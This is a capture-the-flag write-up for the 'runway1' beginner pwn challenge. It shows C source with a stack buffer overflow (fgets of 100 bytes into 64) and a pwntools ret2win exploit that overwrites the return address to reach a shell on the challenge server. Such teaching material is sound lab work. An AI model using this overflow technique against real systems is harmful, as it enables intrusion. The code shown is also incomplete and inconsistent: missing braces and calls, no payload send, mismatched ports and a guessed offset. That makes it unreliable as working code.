## runway1 [60 pts]
**Category:** beginner-pwn
**Solves:** 217
## Description
Starting to ramp up!
nc challs.pwnoh.io 13400
### Solution
Checking the source code:
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#include <fcntl.h>
#include <sys/sendfile.h>
int win() {
printf("You win! Here is your shell:\n");
int get_favorite_food() {
char food[64];
printf("What is your favorite food?\n");
fgets(food, 100, stdin);
printf("Hmmm..... %s...", food);
int main() {
int rand_num;
rand_num = rand() % 100;
if (rand_num <= 50) {
printf("That sounds delicious!\n");
} else if (rand_num <= 70) {
printf("Eh, that sounds okay.\n");
} else if (rand_num <= 80) {
printf("That's my favorite food too!\n");
} else if (rand_num <= 90) {
printf("I've never tried that before!\n");
} else if (rand_num <= 100) {
printf("Ew! I would never eat that.\n");
return 0;
it's just a simple buffer overflow, we need to overflow buffer and overwrite Return address to `win` method address.
from pwn import *
# Set up pwntools to interact with the binary
binary = './runway1' # Replace with your binary's name
elf = context.binary = ELF(binary)
# Find the address of the win() function
win_address = elf.symbols['win']
# Start the binary process
# p = process(binary)
p = remote('challs.pwnoh.io', 13401)
# Get the offset using cyclic patterns
offset = 76 # Assuming 76 is the offset (based on buffer size, this is likely correct)
# Build the payload
payload = b'A' * offset # Padding to reach return address
payload += p64(win_address) # Overwrite return address with win() function address
# Send the payload
p.recvuntil('What is your favorite food?')
# Interact with the shell
And we get a shell and can read flag from it.